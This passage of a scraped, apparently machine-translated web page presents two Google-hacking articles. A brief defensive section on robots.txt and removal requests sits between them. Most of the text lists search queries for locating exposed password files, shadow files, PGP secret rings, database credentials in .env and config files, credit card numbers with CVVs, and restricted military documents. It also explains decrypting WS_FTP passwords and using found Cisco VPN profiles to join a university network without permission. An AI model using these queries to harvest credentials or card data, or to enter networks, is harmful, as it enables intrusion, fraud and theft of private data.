it for his own purposes. To find all such pages, it is enough to notice that they all contain the words: index of in their title. But since the index of words contain not only such pages, we need to refine the query and take into account the keywords on the page itself, so queries like:</p> <p><b>intitle:index.of parent directory <br>intitle:index.of name size</b></p> <p>Since most directory listings are intentional, you may have a hard time finding misplaced listings the first time. But at least you will be able to use the listings to determine the WEB server version, as described below.</p> <h3>Getting the WEB server version.</h3> <p>Knowing the WEB server version is always helpful before starting any hacker attack. Again thanks to Google it is possible to get this information without connecting to a server. If you carefully look at the directory listing, you can see that the name of the WEB server and its version are displayed there.</p> <p><b>Apache1.3.29 - ProXad Server at trf296.free.fr Port 80</b></p> <p>An experienced administrator can change this information, but, as a rule, it is true. Thus, to get this information, it is enough to send a request:</p> <p><b>intitle:index.of server.at</b></p> <p>To get information for a specific server, we refine the request:</p> <p><b>intitle:index.of server.at site:ibm.com</b></p> <p>Or vice versa, we are looking for servers running on a specific version of the server:</p> <p><b>intitle:index.of Apache/2.0.40 Server at</b></p> <p>This technique can be used by a hacker to find a victim. If, for example, he has an exploit for a certain version of the WEB server, then he can find it and try the existing exploit.</p> <p>You can also get the server version by looking at the pages that are installed by default when installing a fresh version of the WEB server. For example, to see the Apache 1.2.6 test page, just type</p> <p><b>intitle:Test.Page.for.Apache it.worked!</b></p> <p>Moreover, some <a href="https://unitarmy.ru/en/zvuk-i-karty/operacionnaya-sistema-rossiiskogo-proizvodstva-operacionnaya.html">Operating Systems</a> during installation, they immediately install and launch the WEB server. However, some users are not even aware of this. Naturally, if you see that someone has not deleted the default page, then it is logical to assume that the computer has not been subjected to any configuration at all and is probably vulnerable to attacks.</p> <p>Try looking for IIS 5.0 pages</p> <p><b>allintitle:Welcome to Windows 2000 Internet Services</b></p> <p>In the case of IIS, you can determine not only the version of the server, but also the version of Windows and the Service Pack.</p> <p>Another way to determine the version of the WEB server is to look for manuals (help pages) and examples that can be installed on the site by default. Hackers have found quite a few ways to use these components to gain privileged access to the site. That is why you need to remove these components on the production site. Not to mention the fact that by the presence of these components you can get information about the type of server and its version. For example, let's find the apache manual:</p> <p><b>inurl:manual apache directives modules</b></p> <h3>Using Google as a CGI scanner.</h3> <p>CGI scanner or WEB scanner is a utility for searching for vulnerable scripts and programs on the victim's server. These utilities need to know what to look for, for this they have a whole list of vulnerable files, for example:</p> <p><b>/cgi-bin/cgiemail/uargg.txt <br>/random_banner/index.cgi <br>/random_banner/index.cgi <br>/cgi-bin/mailview.cgi <br>/cgi-bin/maillist.cgi <br>/cgi-bin/userreg.cgi <br><br>/iissamples/ISSamples/SQLQHit.asp <br>/SiteServer/admin/findvserver.asp <br>/scripts/cphost.dll <br>/cgi-bin/finger.cgi</b></p> <p>We can find each of these files using Google, additionally using the words index of or inurl with the file name in the search bar: we can find sites with vulnerable scripts, for example:</p> <p><b>allinurl:/random_banner/index.cgi</b></p> <p>With additional knowledge, a hacker could exploit a script vulnerability and use the vulnerability to force the script to serve any file stored on the server. For example a password file.</p> <h2>How to protect yourself from being hacked through Google.</h2> <h4>1. Do not upload important data to the WEB server.</h4> <p>Even if you posted the data temporarily, you can forget about it or someone will have time to find and take this data before you erase it. Don't do it. There are many other ways to transfer data that protect it from theft.</p> <h4>2. Check your site.</h4> <p>Use the described methods to research your site. Check your site periodically for new methods that appear on the site http://johnny.ihackstuff.com. Remember that if you want to automate your actions, you need to get special permission from Google. If you carefully read <a target="_blank" href="http://www.google.com/terms_of_service.html">http://www.google.com/terms_of_service.html</a>, then you will see the phrase: You may not send automated queries of any sort to Google's system without express permission in advance from Google.</p> <h4>3. You may not need Google to index your site or part of it.</h4> <p>Google allows you to remove a link to your site or part of it from its database, as well as remove pages from the cache. In addition, you can prohibit the search for images on your site, prohibit the display of short fragments of pages in search results All the possibilities for deleting a site are described on the page <a target="_blank" href="http://www.google.com/remove.html">http://www.google.com/remove.html</a>. To do this, you must confirm that you are really the owner of this site or insert tags on the page or</p> <h4>4. Use robots.txt</h4> <p>It is known that search engines look into the robots.txt file at the root of the site and do not index those parts that are marked with the word <b>Disallow</b>. You can use this to prevent part of the site from being indexed. For example, to avoid indexing the entire site, create a robots.txt file containing two lines:</p> <p><b>User-agent: * <br>disallow: /</b></p> <h2>What else happens</h2> <p>So that life does not seem like honey to you, I will say in the end that there are sites that follow those people who, using the above methods, look for holes in scripts and WEB servers. An example of such a page is</p> <h2>Appendix.</h2> <p>A little sweet. Try one of the following for yourself:</p> <p>1. #mysql dump filetype:sql - search for mySQL database dumps <br>2. Host Vulnerability Summary Report - will show you what vulnerabilities other people have found <br>3. phpMyAdmin running on inurl:main.php - this will force close the control via phpmyadmin panel <br>4. Not for distribution confidential <br>5. Request Details Control Tree Server Variables <br>6. Running in child mode <br>7. This report was generated by WebLog <br>8. intitle:index.of cgiirc.config <br>9. filetype:conf inurl:firewall -intitle:cvs - maybe someone needs firewall configuration files? :) <br>10. intitle:index.of finances.xls - hmm.... <br>11. intitle:Index of dbconvert.exe chats - icq chat logs <br>12. intext:Tobias Oetiker traffic analysis <br>13. intitle:Usage Statistics for Generated by Webalizer <br>14. intitle:statistics of advanced web statistics <br>15. intitle:index.of ws_ftp.ini - ws ftp config <br>16. inurl:ipsec.secrets holds shared secrets - secret key - good find <br>17. inurl:main.php Welcome to phpMyAdmin <br>18. inurl:server-info Apache Server Information <br>19. site:edu admin grades <br>20. ORA-00921: unexpected end of SQL command - get paths <br>21. intitle:index.of trillian.ini <br>22. intitle:Index of pwd.db <br>23. intitle:index.of people.lst <br>24. intitle:index.of master.passwd <br>25.inurl:passlist.txt <br>26. intitle:Index of .mysql_history <br>27. intitle:index of intext:globals.inc <br>28. intitle:index.of administrators.pwd <br>29. intitle:Index.of etc shadow <br>30. intitle:index.of secring.pgp <br>31. inurl:config.php dbuname dbpass <br>32. inurl:perform filetype:ini</p><li>"Hacking mit Google"</li> <span> <p>Training center "Informzaschita" http://www.itsecurity.ru - a leading specialized center in the field of information security training (License of the Moscow Committee of Education No. 015470, State accreditation No. 004251). The only authorized training center of Internet Security Systems and Clearswift in Russia and CIS countries. Microsoft authorized training center (Security specialization). Training programs are coordinated with the State Technical Commission of Russia, FSB (FAPSI). Certificates of training and state documents on advanced training.</p><p>SoftKey is a unique service for buyers, developers, dealers and affiliate partners. In addition, this is one of the best online software stores in Russia, Ukraine, Kazakhstan, which offers customers a wide range, many payment methods, prompt (often instant) order processing, tracking the order fulfillment process in the personal section, various discounts from the store and manufacturers ON.</p> </span> <p>Receiving private data does not always mean hacking - sometimes it is published in the public domain. Knowing the settings of Google and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.</p> <h2>WARNING</h2>All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article. <p>Everything is connected to the Internet today, caring little about restricting access. Therefore, many private data become the prey of search engines. Spider robots are no longer limited to web pages, but index all content available on the Web and constantly add confidential information to their databases. Learning these secrets is easy - you just need to know how to ask about them.</p><h2>Looking for files</h2> <p>In capable hands, Google will quickly find everything that is bad on the Web, such as personal information and files for official use. They are often hidden like a key under a rug: there are no real access restrictions, the data just lies in the back of the site, where links do not lead. Google's standard web interface only provides <a href="https://unitarmy.ru/en/noutbuki-i-netbuki/kakaya-raznica-mezhdu-vmware-vsphere-esxi-i-vcenter-ustanovka-i-bazovaya-nastroika.html">basic settings</a> advanced search, but even those will suffice.</p> <p>There are two operators you can use to restrict Google searches to files of a certain type: filetype and ext . The first sets the format that the search engine determined by the file header, the second - the file extension, regardless of its internal content. When searching in both cases, you need to specify only the extension. Initially, the ext operator was convenient to use in cases where there were no specific format characteristics for the file (for example, to search for ini and cfg configuration files, inside of which anything can be). Now Google's algorithms have changed, and there is no visible difference between the operators - the results are the same in most cases.</p> <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359798_b3e1_filetype_ext.png' width="100%" loading=lazy loading=lazy><h2>Filtering the output</h2> <p>By default, Google searches for words and in general for any characters entered in all files on indexed pages. You can limit the search scope by the top-level domain, a specific site, or by the location of the desired sequence in the files themselves. For the first two options, the site statement is used, followed by the name of the domain or the selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the specified in the body of the links themselves, allinanchor - in the text provided with the tag <a name>, allintitle - in the page headers, allintext - in the body of the pages.</p> <p>For each operator there is a lighter version with a shorter name (without the prefix all). The difference is that allinurl will find links with all words, while inurl will only find links with the first of them. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another similar in meaning - site . The first one also allows you to find any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.</p> <p>Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes, which will expire only after two years (or when their owners get tired of feeding everyone in a row).</p><p>Allintext: card number expiration date /2017 cvv <br><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359828_0660_cc_2017.png' width="100%" loading=lazy loading=lazy></p><p>When you read on the news that a young hacker "hacked into the servers" of the Pentagon or NASA, stealing classified information, then in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely such a list is in electronic form. For convenience or due to an oversight, it can also lie on the organization's website itself. It is logical that in this case there will be no references to it, since it is intended for internal use. What words can be in such a file? At least - the field "address". It is easy to test all these assumptions.</p> <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359852_9681_google_inurl.png' width="100%" loading=lazy loading=lazy><p>inurl:nasa.gov filetype:xlsx "address"</p> <br><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359864_215b_nasa_address.png' width="100%" loading=lazy loading=lazy><h2>We use bureaucracy</h2> <p>Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google Webmaster Operators, the Web itself, and the structure of what you're looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need in order to get really valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces typical formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.</p> <p>For example, the Distribution statement stamp, which is mandatory in the office of the US Department of Defense, means standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B - intended for internal use only, C - strictly confidential, and so on up to F. Separately, there is the letter X, which marks especially valuable information that represents a state secret of the highest level. Let those who are supposed to do it on duty look for such documents, and we will limit ourselves to files with the letter C. According to DoDI 5230.24, such marking is assigned to documents containing a description of critical technologies that fall under export control. You can find such carefully guarded information on sites in the .mil top-level domain allocated to the US Army.</p><p>"DISTRIBUTION STATEMENT C" inurl:navy.mil <br><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359886_8f3e_distribution_c.jpg' width="100%" loading=lazy loading=lazy></p><p>It is very convenient that only sites from the US Department of Defense and its contract organizations are collected in the .mil domain. Domain-limited search results are exceptionally clean, and the titles speak for themselves. It is practically useless to search for Russian secrets in this way: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound like botanical (PP "Kiparis", self-propelled guns "Acacia") or even fabulous (TOS "Pinocchio").</p> <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359901_5076_th-57c.jpg' width="100%" loading=lazy loading=lazy><p>By carefully examining any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions "Sec 2751", which is also convenient to search for interesting technical information. From time to time, it is removed from official sites, where it once appeared, so if you can’t follow an interesting link in the search results, use the Google cache (cache operator) or the Internet Archive website.</p> <h2>We climb into the clouds</h2> <p>In addition to accidentally declassified documents from government departments, links to personal files from Dropbox and other data storage services that create "private" links to publicly published data occasionally pop up in the Google cache. It's even worse with alternative and self-made services. For example, the following query finds the data of all Verizon clients that have an FTP server installed and actively using a router on their router.</p><p>Allinurl:ftp://verizon.net</p><p>There are now more than forty thousand such smart people, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external drive connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file download. All the content of such media is indexed by Google and other search engines, so you can access files stored on external drives via a direct link.</p> <p><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359919_7cea_allinurl_verizon_ftp.png' width="100%" loading=lazy loading=lazy></p> <h2>Peeping configs</h2> <p>Before the wholesale migration to the clouds, simple FTP servers, which also lacked vulnerabilities, ruled as remote storages. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read because all entries are stored in plain text and passwords are encrypted using the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359934_1d8d_ws_ftp-pwd.png' width="100%" loading=lazy loading=lazy></p> <p>Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359947_3060_ws_ftp-pwd_found.png' width="100%" loading=lazy loading=lazy></p> <p>When talking about hacking an arbitrary site, they usually mean getting a password from logs and backups of CMS or e-commerce application configuration files. If you know their typical structure, then you can easily indicate the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user ID (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them like this:</p><p>"pwd=" "UID=" ext:inc</p><h2>We reveal passwords from the DBMS</h2> <p>In the configuration files of SQL servers, names and addresses <a href="https://unitarmy.ru/en/windows-7/rambler-elektronnaya-pochta-proverit-vhodyashchie-kak-sozdat.html">Email</a> users are stored in clear text, and their MD5 hashes are written instead of passwords. Decrypting them, strictly speaking, is impossible, but you can find a match among known hash-password pairs.</p> <p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359963_9e67_sql_code.png' width="100%" loading=lazy loading=lazy></p> <p>Until now, there are DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.</p><p>Intext:DB_PASSWORD filetype:env</p><p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359975_d137_env.png' width="100%" loading=lazy loading=lazy></p> <p>With the advent of <a href="https://unitarmy.ru/en/brauzery/debugging-tools-for-windows-ispolzovanie-ustanovka-debugging-tools-for-windows.html">Windows servers</a> the place of configuration files was partly occupied by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:</p><p>Filetype:reg HKEY_CURRENT_USER "Password"=</p><p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359995_2ecf_reg.png' width="100%" loading=lazy loading=lazy></p> <h2>Don't Forget the Obvious</h2> <p>Sometimes it is possible to get to classified information with the help of data accidentally opened and caught by Google. The ideal option is to find a list of passwords in some common format. Only desperate people can store account information in a text file, a Word document, or an Excel spreadsheet, but there are always enough of them.</p><p>Filetype:xls inurl:password</p><p><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360015_16e4_xls.png' width="100%" loading=lazy loading=lazy></p> <p>On the one hand, there are many means to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch CMS, do not use left scripts and close other holes. There is also a file with a robots.txt exclusion list, which prohibits search engines from indexing the files and directories specified in it. On the other hand, if the robots.txt structure on some server differs from the standard one, then it immediately becomes clear what they are trying to hide on it.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360029_5da8_robots.png' width="100%" loading=lazy loading=lazy></p> <p>The list of directories and files on any site is preceded by the standard inscription index of. Since it must appear in the title for service purposes, it makes sense to limit its search to the intitle operator. Interesting stuff can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360054_2a7b_indexof.png' width="100%" loading=lazy loading=lazy></p> <h2>Follow the updates</h2> <p>Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request url) and the "real time" filter (&tbs=qdr:1).</p> <p>The time interval of the last file update date from Google is also implicitly indicated. Through the graphical web interface, you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.</p> <p>From the appearance of the address bar, one can only guess about a way to limit the output of results using the &tbs=qdr: construct. The letter y after it specifies a limit of one year (&tbs=qdr:y), m shows the results for the last month, w for the week, d for the past day, h for the last hour, n for the minute, and s for the give me a sec. The most recent results just made known to Google are found using the &tbs=qdr:1 filter.</p> <p>If you need to write a tricky script, it will be useful to know that the date range is set in Google in Julian format through the daterange operator. For example, this is how you can find a list of PDF documents with the word confidential uploaded between January 1st and July 1st, 2015.</p><p>Confidential filetype:pdf daterange:2457024-2457205</p><p>The range is specified in Julian date format without decimals. It is inconvenient to translate them manually from the Gregorian calendar. It's easier to use a date converter.</p> <h2>Targeting and filtering again</h2> <p>In addition to specifying additional operators in the search query, they can be sent directly in the link body. For example, the filetype:pdf trait corresponds to the as_filetype=pdf construct. Thus, it is convenient to set any clarifications. Let's say that the output of results only from the Republic of Honduras is set by adding the construction cr=countryHN to the search URL, but only from the city of Bobruisk - gcs=Bobruisk . See the developer section for a complete list of .</p> <p>Google's automation tools are designed to make life easier, but often add to the hassle. For example, a user's city is determined by the user's IP through WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same query, different results will get to the first page, and some of them may turn out to be completely hidden. Feel like a cosmopolitan and search for information from any country will help its two-letter code after the directive gl=country . For example, the code for the Netherlands is NL, while the Vatican and North Korea do not have their own code in Google.</p> <p>Often search results are littered even after using a few advanced filters. In this case, it is easy to refine the query by adding a few exception words to it (each of them is preceded by a minus sign). For example, banking , names , and tutorial are often used with the word Personal. Therefore, cleaner search results will show not a textbook example of a query, but a refined one:</p><p>Intitle:"Index of /Personal/" -names -tutorial -banking</p><h2>Last Example</h2> <p>A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is a convenient thing, but either expensive or temporary and with restrictions. Signing up for yourself alone is too expensive. It's good that there are group subscriptions, and with the help of Google it's easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles . One request, and you join, for example, the friendly staff of the University of Bonn.</p><p>Filetype:pcf vpn OR Group</p><p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360077_d28b_vpn.png' width="100%" loading=lazy loading=lazy></p> <h2>INFO</h2>Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service. <br><p>The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and provides it for free through thecampusgeeks.com.</p> <p>With the help of Google, hundreds of different types of attacks and penetration tests are performed. There are many options, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you're looking for makes it much easier to get the information you need (especially the information you didn't intend to make public). Not only Shodan feeds interesting ideas, but any database of indexed network resources! <br></p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+""+screen.height+""+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="post-share"> <div>Share with friends or save for yourself:</div> <script src="//yastatic.net/es5-shims/0.0.2/es5-shims.min.js"></script> <script src="//yastatic.net/share2/share.js"></script> <div class="ya-share2" data-services="collections,vkontakte,facebook,odnoklassniki,moimir,gplus,viber,whatsapp,skype,telegram"></div> <br> <div id="post-ratings-14689-loading" class="post-ratings-loading"> <img src="https://unitarmy.ru/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" / loading=lazy loading=lazy>Loading...</div> </div> <div class='yarpp-related'> <div class="related"> <div class="headline">Recommended related articles</div> <div class="items"> <div class="item"> <div class="item__image"> <picture> <source media="(max-width: 479px)" srcset="/wp-content/themes/unitarmy.ru/cache/945f81849_460x250.png"><img src="/uploads/534cb684b9cef78076412101c64248de.jpg" width="240" height="240" alt="What is an EFI system or UEFI partition?" / loading=lazy loading=lazy></picture> </div> <div class="item__title"><a href="https://unitarmy.ru/en/obzory/chem-otlichaetsya-uefi-ot-bios-chto-takoe-sistema-efi-ili-razdel-uefi-kompyuternaya.html">What is an EFI system or UEFI partition?</a></div> </div> <div class="item"> <div class="item__image"> <picture> <source media="(max-width: 479px)" srcset="/wp-content/themes/unitarmy.ru/cache/945f81849_460x250.png"><img src="/uploads/f1524ed1e3bcccadd0289a20ee97b71b.jpg" width="240" height="240" alt="What happened to Linkedin?" / loading=lazy loading=lazy></picture> </div> <div class="item__title"><a href="https://unitarmy.ru/en/windows-8/otkryt-linkedin-v-obhod-blokirovki-chto-zhe-proizoshlo-s-linkedin-mneniya.html">What happened to Linkedin?</a></div> </div> <div class="item"> <div class="item__image"> <picture> <source media="(max-width: 479px)" srcset="/wp-content/themes/unitarmy.ru/cache/945f81849_460x250.png"><img src="/uploads/a84f6c686a4f5f9fb75304968bed86fd.jpg" width="240" height="240" alt="What is Skype Who invented Skype" / loading=lazy loading=lazy></picture> </div> <div class="item__title"><a href="https://unitarmy.ru/en/razlichnye-problemy/vs-chto-nuzhno-znat-o-skype-chto-takoe-skype-kto-pridumal-skaip.html">What is Skype Who invented Skype</a></div> </div> </div> </div> </div> </main> <aside class="sidebar"> <div class="amulets sidebar__section"> <div class="headline">Popular Articles</div> <ul class="amulets__list"> <li class="amulets__list-item"><a href="https://unitarmy.ru/en/windows-7/vs-chto-nuzhno-znat-o-skype-chto-takoe-skype-skolko-polzovatelei.html">What is Skype How many Skype users in the world</a></li> <li class="amulets__list-item"><a href="https://unitarmy.ru/en/kompyuter-zhelezo/gugl-meil-vhod-pochta-gmail-com-registraciya-vhod-kak-otpravit-pismo-chtoby.html">Mail gmail com: registration, login, how to send an email</a></li> <li class="amulets__list-item"><a href="https://unitarmy.ru/en/windows/telegram-chto-tam-est-telegram-chto-eto-za-programma-chto-budet-esli-vzlomat.html">Telegram: what is this program</a></li> <li class="amulets__list-item"><a href="https://unitarmy.ru/en/windows/bitkoiny-zapreshcheny-v-rossii-razreshen-li-bitkoin-v-rossii-zakonnost.html">Is Bitcoin allowed in Russia: the legality of using, storing and mining cryptocurrency Legal regulation of cryptocurrencies in Russia</a></li> <li class="amulets__list-item"><a href="https://unitarmy.ru/en/zvuk-i-karty/kogda-byl-sozdan-facebook-kto-vladeet-facebook-osnovnye-ponyatiya-v.html">When was facebook created</a></li> </ul> <div class="amulets__all"><a href="https://unitarmy.ru/en/">See all articles</a></div> </div> <div class="sidebar__section sidebar__widget" id="recent-posts-3"> <div class="headline">Latest articles:</div> <ul> <li> <a href="https://unitarmy.ru/en/google-chrome/i2p-anonimnaya-set-dlya-vhoda-v-internet-anonimnaya-set-i2p-dobro.html">Anonymous i2p network - welcome!</a></li> <li> <a href="https://unitarmy.ru/en/mozilla-firefox/bitkoiny-zapreshcheny-li-v-rossii-maining-kriptovalyut-naskolko-eto-zakonno.html">Cryptocurrency Mining: How Legal Is It?</a></li> <li> <a href="https://unitarmy.ru/en/windows/sergei-druzhko-shou-druzhko-shou---novoe-shou-na-youtube-ot-sergeya-druzhko.html">Druzhko Show - new show on Youtube by Sergey Druzhko</a></li> <li> <a href="https://unitarmy.ru/en/windows-8/ustanovka-processora-na-materinskuyu-platu-1151-sokety-processorov-intel-kakoi.html">Intel processor sockets</a></li> <li> <a href="https://unitarmy.ru/en/windows/universalnyi-draiver-hp-scanjet-zakachat-programmu-dlya-skanera-hp-osnovnye.html">Download software for hp scanner</a></li> <li> <a href="https://unitarmy.ru/en/windows-7/kak-proverit-internet-trafik-na-bilaine-kak-proverit-trafik-na.html">How to check the traffic on the beeline How to check the rest of the traffic on the beeline Volga region</a></li> <li> <a href="https://unitarmy.ru/en/google-chrome/twitch-servis-dlya-video-translyacii-strimov-twitch-servis-dlya-video.html">Twitch - service for video broadcasts (streams) Creation of scenes and sources</a></li> <li> <a href="https://unitarmy.ru/en/windows-8-1/audio-draiver-dlya-materinskoi-platy-asrock-zagruzka-draiverov-dlya.html">Download Drivers for ASRock Motherboard</a></li> <li> <a href="https://unitarmy.ru/en/razlichnye-problemy/veb-monei-koshelek-kak-sozdat-koshelek-webmoney-v-ukraine-ispolzovanie-webmoney-keeper.html">How to create a WebMoney wallet in Ukraine</a></li> <li> <a href="https://unitarmy.ru/en/google-chrome/kak-uznat-tarifnyi-plan-ot-bilaina-po-nomeru-telefona-kak-uznat-svoi.html">How to find out your tariff plan on Beeline?</a></li> </ul> </div> <div class="sidebar__section sidebar__widget" id="text-2"> <div class="textwidget"> </div> </div> </aside> </div> <footer class="footer"><nav class="footer__nav nav"><ul> <li class="menu-item type-post_type object-page "><a href="" itemprop="url">Feedback</a></li> <li class="menu-item type-post_type object-page "><a href="https://unitarmy.ru/en/sitemap.xml" itemprop="url">map of site</a></li> <li class="menu-item type-post_type object-page "><a href="" itemprop="url">Advertising</a> <li class="menu-item type-post_type object-page "><a href="" itemprop="url">About the site</a></li> </ul></nav><div class="footer__inner"><div class="footer__copyright" style="background:none;"> <div class="footer__copyright-title1"></div> <p>© 2022. All rights reserved <br />Basics of working on a personal computer</p> </div><div class="footer__counters"></div><div class="footer__info"><p></p></div></div></footer> </div> </div> <script type="text/javascript" defer src="https://unitarmy.ru/wp-content/script.js"></script> </body> </html>